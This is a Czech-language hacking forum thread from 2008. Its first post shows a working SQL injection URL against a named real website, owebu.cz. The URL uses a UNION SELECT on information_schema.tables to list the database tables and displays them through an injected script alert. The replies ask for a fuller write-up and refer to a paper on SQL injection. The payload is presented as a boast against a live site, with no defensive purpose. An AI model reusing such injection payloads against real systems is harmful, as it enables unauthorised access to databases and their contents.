| hh, listujeme tabulky z db alertem :D [link]
owebu.cz/serialy.php?serial=65 UNION ALL SELECT
0,'h','hovno2','hovno3',
concat("<script>alert('SIXSS by Pr00y4m - tabulky:
",table_name,"');</script>"),table_na
me FROM
information_schema.tables WHERE table_schema=database() /*
----------
Pravá láska je, když si zapamatuješ její IP, abys obešel zpoždění DNS :)
(odpovědět) | |
|
|
| Zajimavej postup, nechtel by jsi tuhle moznost trochu vic popsat?
(odpovědět) | | infinity | 213.19.59.* | 2.3.2008 11:30 |
|
|
|
| pise o ni RubberDuck ve svem paperu :)
----------
..:@]> [link] <[@:..
(odpovědět) | DjH |  |  |  319-960-895 | 2.3.2008 13:03 |
|
|
|
| DjH: No to mi je jasny, ja myslel nejak rozepsat to alertovani dat z db :P
(odpovědět) | | infinity | 213.19.59.* | 2.3.2008 13:27 |
|
|
|
| to je jasne myslim z kodu ne? :)
----------
..:@]> [link] <[@:..
(odpovědět) | | DjH | | | 319-960-895 | 2.3.2008 13:40 |
|
|
|
| DjH: Ja myslel rozepsat jako clanek, ne nejakou napovedu pro me. Poradnej clanek o sql injekt tady jeste neni.
(odpovědět) | | infinity | 213.19.59.* | 2.3.2008 14:16 |
|
|
|
| a ja zas rikam ze ten RubberDuckuv paper nema chybu, takze bud sem pastnout ten jeho paper o SQL injekci (samozrejme muze byt trochu upravenej ;)), nebo udelat jeste lepsi clanek :)
----------
..:@]> [link] <[@:..
(odpovědět) | | DjH | | | 319-960-895 | 2.3.2008 14:24 |
|
|
|
| DjH: Souhlas :) Vyborne napsany paper, melo by to vyjit v papirove verzi... :)
Jinak, je to tu: [link]
----------
Pravá láska je, když si zapamatuješ její IP, abys obešel zpoždění DNS :)
(odpovědět) | |
|
|
